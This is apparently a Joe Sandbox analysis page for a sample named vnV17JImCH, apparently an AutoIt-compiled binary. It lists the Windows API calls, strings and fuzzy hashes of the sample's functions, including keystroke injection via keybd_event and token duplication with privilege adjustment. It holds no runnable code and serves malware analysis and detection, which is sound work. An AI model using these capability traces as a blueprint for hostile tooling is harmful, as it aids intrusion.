Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 06429726bdb72a07c8416af0bc66b384a70b9f629ee8054dc231ee0d1471e8e6
Instruction ID: 5329aa830d84666c637d95c300173d87baa06289957c0d828dfcf2419b28f0db
Opcode Fuzzy Hash: 06429726bdb72a07c8416af0bc66b384a70b9f629ee8054dc231ee0d1471e8e6
Instruction Fuzzy Hash: 1C11C475600209ABCF15AF70CC12FAD77E8AFC9710F109429F541BF1C1EAF1AA05A761

Function 00EDFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00EDFD91

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 69c29eeb6ecbc4348d908ae4c1a159d7fc1f3c204d335c81f4f07715c485d411
Instruction ID: 905eaff312269214b578dfe06b2f83ad0b55c78338ed585435a3dbb99fc554b2
Opcode Fuzzy Hash: 69c29eeb6ecbc4348d908ae4c1a159d7fc1f3c204d335c81f4f07715c485d411
Instruction Fuzzy Hash: 0C211774508341DFDB24DF64C444B5ABBE1BF89314F09996CE88A6B762D731F805CB52

Function 00EA5BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00EA56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00EA5C16

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 211cfeaa6d57a972a45c1789816de0e204af7302c9fa3da68459ec08bcf97f0e
Instruction ID: 9c84b7df1d7e6585a727262c8343e4276cbe6471d53eea11a26a2368dd98c402
Opcode Fuzzy Hash: 211cfeaa6d57a972a45c1789816de0e204af7302c9fa3da68459ec08bcf97f0e
Instruction Fuzzy Hash: E4113A32200B049FD330CF19C880B62B7F4EF4A765F10D92DE99A9AA51D770F845CB60

Function 00EA5A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EDDD18

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
Instruction ID: db7f8b898df96917a67ce45da1d6a34bdcb365490edfa21a1a20360e74b36e77
Opcode Fuzzy Hash: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
Instruction Fuzzy Hash: B3017CB5200902AFC305EB68C541D2AF7E9FF8A3107145569E929DB702DB35FC22CBE0

Function 00EC4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00EC48A6

Part of subcall function 00EC8B28: __getptd_noexit.LIBCMT ref: 00EC8B28

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 37dd6ad3372cea7030e6632c8200a9725da1f19455d1f32e8bb589da4491111f
Instruction ID: 8ac4b92e042bbcf6b2b59b6229d24b79503db35455581162fabf215660e68931
Opcode Fuzzy Hash: 37dd6ad3372cea7030e6632c8200a9725da1f19455d1f32e8bb589da4491111f
Instruction Fuzzy Hash: E5F0A472900645EBDF15AF648F05FEE36E0AF10325F15641CB824B61D1CB7A8953DB51

Function 00EA4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00F652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EA4E7E

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 262eb32bbf91e2096bded071e8c0357c3854082e9b9c5aa0e1317fb6314f42ad
Instruction ID: 0448901a1056b79ac3c7e66bcce0c1dda8b5ac8f0d6e68b0c9b70f47165cca62
Opcode Fuzzy Hash: 262eb32bbf91e2096bded071e8c0357c3854082e9b9c5aa0e1317fb6314f42ad
Instruction Fuzzy Hash: CEF030B1501711CFCB349F64D494852B7F1BF99329310D97EE1D79A650C7B2A854DF40

Function 00EC0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EC07B0

Part of subcall function 00EA7BCC: _memmove.LIBCMT ref: 00EA7C06

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: d5b211a329cc72ad9851415cce170185ab8747b280c4e2d37883760a25532611
Instruction ID: 949daec61d82ade985a9b85db04d230a3a0f25b64e40a064c6d330e3c5f7493f
Opcode Fuzzy Hash: d5b211a329cc72ad9851415cce170185ab8747b280c4e2d37883760a25532611
Instruction Fuzzy Hash: 90E086769041285BC720D6989C05FEA77EDDB8D7A0F0441B6FC08D7244D960AC858690

Function 00F08E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00F08EC1

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: 69305cb1a6e2ae7610767968a30a92f7e7ab6af9b10f9dadd88ff357794719ac
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: F1E092B1504B009BD7388A24D800BA373E1AB05314F00081DF2EA93241EBA378429759

Function 00EA5C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00EDDD42,?,?,00000000), ref: 00EA5C5F

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: fc1cc8834c62bde45db5ba9106b4171dc822a532417e682e551e2a73b943e1ca
Instruction ID: 2d4ffa325c9bc0464d8cc7bb1096aaf592d354fb0b57334edb411463ba25e8df
Opcode Fuzzy Hash: fc1cc8834c62bde45db5ba9106b4171dc822a532417e682e551e2a73b943e1ca
Instruction Fuzzy Hash: 90D0C77465020CBFE710DB80DC46FA9777CD705710F500194FD0456290D6B27D549795

Function 00EC525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00EC5266

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 104a94abb610591848217197004de8504e06e557ad8a0165531898f721272e87
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: B6B0927644020C77CE012A82EC02F497BA99B417A4F408024FB0C28172A673A6A59A89

Function 00F0D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00F0D1FF

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 77ddb00ae9537e19207d3d112f678f8d0562cb93e5f340e780bda18251c2936c
Instruction ID: 1875ac65cbebacc8d4d5b17139dead87821e9e072cbe1ba3abe5d94fb953618e
Opcode Fuzzy Hash: 77ddb00ae9537e19207d3d112f678f8d0562cb93e5f340e780bda18251c2936c
Instruction Fuzzy Hash: FE7192316083018FD714EF64C491A6EB7E1AF8A314F04596DF896AB3A2DB34ED05EB52

Function 016F439C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 016F43B1

Memory Dump Source

Source File: 00000000.00000002.2361212309.00000000016F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f2000_vnV17JImCH.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: da92498707c4f1b11004995777ec8ab01a7dffc02e0eedc44ed48530212c9800
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 00E0BF7594010EEFDB00EFE4D9496DE7BB4EF04301F1006A5FE05D7681DB309E548A62

Function 016F43A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 016F43B1

Memory Dump Source

Source File: 00000000.00000002.2361212309.00000000016F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f2000_vnV17JImCH.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 871ac3888d2956f2ccb3610557d1d136b2d16da1a17fab5a586f256c3348cd82
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 85E0E67594010EDFDB00EFF4D94969E7FF4EF04301F100265FD01D2281DA309D508A62

Non-executed Functions

Function 00F2CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA2612: GetWindowLongW.USER32(?,000000EB), ref: 00EA2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F2CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F2CB95
GetWindowLongW.USER32(?,000000F0), ref: 00F2CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F2CC00
SendMessageW.USER32 ref: 00F2CC29
_wcsncpy.LIBCMT ref: 00F2CC95
GetKeyState.USER32(00000011), ref: 00F2CCB6
GetKeyState.USER32(00000009), ref: 00F2CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F2CCD9
GetKeyState.USER32(00000010), ref: 00F2CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F2CD0C
SendMessageW.USER32 ref: 00F2CD33
SendMessageW.USER32(?,00001030,?,00F2B348), ref: 00F2CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F2CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F2CE60
SetCapture.USER32(?), ref: 00F2CE69
ClientToScreen.USER32(?,?), ref: 00F2CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F2CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F2CEF5
ReleaseCapture.USER32 ref: 00F2CF00
GetCursorPos.USER32(?), ref: 00F2CF3A
ScreenToClient.USER32(?,?), ref: 00F2CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F2CFA3
SendMessageW.USER32 ref: 00F2CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F2D00E
SendMessageW.USER32 ref: 00F2D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F2D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F2D06D
GetCursorPos.USER32(?), ref: 00F2D08D
ScreenToClient.USER32(?,?), ref: 00F2D09A
GetParent.USER32(?), ref: 00F2D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F2D123
SendMessageW.USER32 ref: 00F2D154
ClientToScreen.USER32(?,?), ref: 00F2D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F2D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F2D20C
SendMessageW.USER32 ref: 00F2D22F
ClientToScreen.USER32(?,?), ref: 00F2D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F2D2B5

Part of subcall function 00EA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EA25EC

GetWindowLongW.USER32(?,000000F0), ref: 00F2D351

Strings

F, xrefs: 00F2D235
@GUI_DRAGID, xrefs: 00F2CE9C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 57226bb4530b59cd8a0dd4e3bfd98eb78ebd6300c91ff56ce12bcdd88abe7d15
Instruction ID: 2c72bd5011bebb6108ffc96c882e912d534f4ace41578835449780e2dd167575
Opcode Fuzzy Hash: 57226bb4530b59cd8a0dd4e3bfd98eb78ebd6300c91ff56ce12bcdd88abe7d15
Instruction Fuzzy Hash: 3342CE38604294AFD720CF24E844FAABBF5FF89720F140529F5959B2B0C771E845EB92

Function 00EB6F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EB71C3
_memset.LIBCMT ref: 00EB7539
_memmove.LIBCMT ref: 00EB76AC

Strings

3c, xrefs: 00EF23A0
Q\E, xrefs: 00EB7FCB
DEFINE, xrefs: 00EF2103
\b(?=\w), xrefs: 00EF3769
[:>:]], xrefs: 00EB7492
_, xrefs: 00EF23CB
\b(?<=\w), xrefs: 00EF3773
[:<:]], xrefs: 00EB7479

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memmove$_memset
String ID: 3c$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
API String ID: 1357608183-3681475764
Opcode ID: 414d68a6a03d4a1fcc3f673898abe8f96800533979f7fc58b74adfdd8cc49a09
Instruction ID: 88f24abaa815c2bdc1acf6558b57d1fcbfd9d4037bdcac9ace133eea14684864
Opcode Fuzzy Hash: 414d68a6a03d4a1fcc3f673898abe8f96800533979f7fc58b74adfdd8cc49a09
Instruction Fuzzy Hash: 3E939271A04219DBDB24CFA8C8817FDB7B1FF48314F25916AEA55BB281E7709E81CB40

Function 00EA48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00EA48DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EDD665
IsIconic.USER32(?), ref: 00EDD66E
ShowWindow.USER32(?,00000009), ref: 00EDD67B
SetForegroundWindow.USER32(?), ref: 00EDD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EDD69B
GetCurrentThreadId.KERNEL32 ref: 00EDD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00EDD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00EDD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00EDD6CF
SetForegroundWindow.USER32(?), ref: 00EDD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EDD6E7
keybd_event.USER32(00000012,00000000), ref: 00EDD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EDD6FC
keybd_event.USER32(00000012,00000000), ref: 00EDD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EDD70A
keybd_event.USER32(00000012,00000000), ref: 00EDD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EDD719
keybd_event.USER32(00000012,00000000), ref: 00EDD71E
SetForegroundWindow.USER32(?), ref: 00EDD721
AttachThreadInput.USER32(?,?,00000000), ref: 00EDD748

Strings

Shell_TrayWnd, xrefs: 00EDD660

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 1701b7f4203abb5f38dbf5a66b8787e1c10428f7e01988f0268205423efd5245
Instruction ID: 6174e88ac3d0dcbf09c53f937d57a001d01e430426cd15c9ec83658fa0636c1e
Opcode Fuzzy Hash: 1701b7f4203abb5f38dbf5a66b8787e1c10428f7e01988f0268205423efd5245
Instruction Fuzzy Hash: AA318271A5031CBAEB302BA19C4AF7F3E7CEB44B50F104076FA04FA1D1C6B05812AAA0

Function 00EF8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00EF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EF882B
Part of subcall function 00EF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EF8858
Part of subcall function 00EF87E1: GetLastError.KERNEL32 ref: 00EF8865

_memset.LIBCMT ref: 00EF8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EF83A5
CloseHandle.KERNEL32(?), ref: 00EF83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EF83CD
GetProcessWindowStation.USER32 ref: 00EF83E6
SetProcessWindowStation.USER32(00000000), ref: 00EF83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EF840A

Part of subcall function 00EF81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EF8309), ref: 00EF81E0
Part of subcall function 00EF81CB: CloseHandle.KERNEL32(?,?,00EF8309), ref: 00EF81F2

Strings

default, xrefs: 00EF8405
winsta0, xrefs: 00EF83C8
, xrefs: 00EF8362

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: c034779488aec8c6201fd79c038ace7f1b06ef0dfb878105457919cf7e461a6e
Instruction ID: c48b09e9ad12afdad6939b8ad3ba10e269f3c2c6865be83be36d85f1bc3daae1
Opcode Fuzzy Hash: c034779488aec8c6201fd79c038ace7f1b06ef0dfb878105457919cf7e461a6e
Instruction Fuzzy Hash: 96814A7190020DAFDF119FA4DE45AFE7BB9EF04308F149169FA14B6261DB318E19DB60

Function 00F0C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F0C78D
